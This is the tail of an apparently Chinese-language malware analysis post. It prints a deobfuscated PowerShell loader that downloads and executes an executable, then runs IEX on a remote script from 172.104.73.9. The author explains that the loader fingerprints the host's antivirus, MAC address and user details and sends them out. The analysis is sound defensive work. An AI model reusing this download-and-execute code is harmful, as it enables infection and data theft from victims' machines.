if(((Get-Service Ddriver | Sort -Property Status).Status -ne "Running") -and (-not (test-path $path))){
(New-Object System.Net.WebClient).DownloadFile("$download","$download_tmp")
[System.Threading.Thread]::Sleep(1000*10)
$size = (Get-ChildItem $download_tmp -recurse | Measure-Object -property length -sum).sum
$exec = New-Object -com shell.application;
$exec.shellexecute($download_tmp);
[System.Threading.Thread]::Sleep(1000*40)
$download3 = "http://172.104.73.9/new.json?3" + (Get-Service Ddriver | Sort -Property Status).Status + "&size=" + $size + $key
IEX (New-Object Net.WebClient).downloadstring("$download3")
}else{
IEX (New-Object Net.WebClient).DownloadString("$download2")
}
}catch{}
try{
New-Item $path -type file
}catch{}

大致意思是，獲取mac地址，AntiVirusProduct（本機安裝的殺軟名稱），是否安裝360的產品，也就是zhudongfangyu。

獲取系統版本號，系統位數，電腦名稱，使用者名稱等，拼接在引數中並請求下載exe，json檔案。樣本中地址是 http://172.104.73.9/dll.exe ，但是現在已經無法訪問。

這裡會判斷一下Driver服務是否在執行，如果執行的話，就不會下載了。下載後的名字應該是update.exe，然後執行。反正這個程式碼也很簡單，我都已經幫大家去掉混淆了

。

雲上樣本就是這麼簡單因為已經無法訪問，所以我也沒法繼續分析了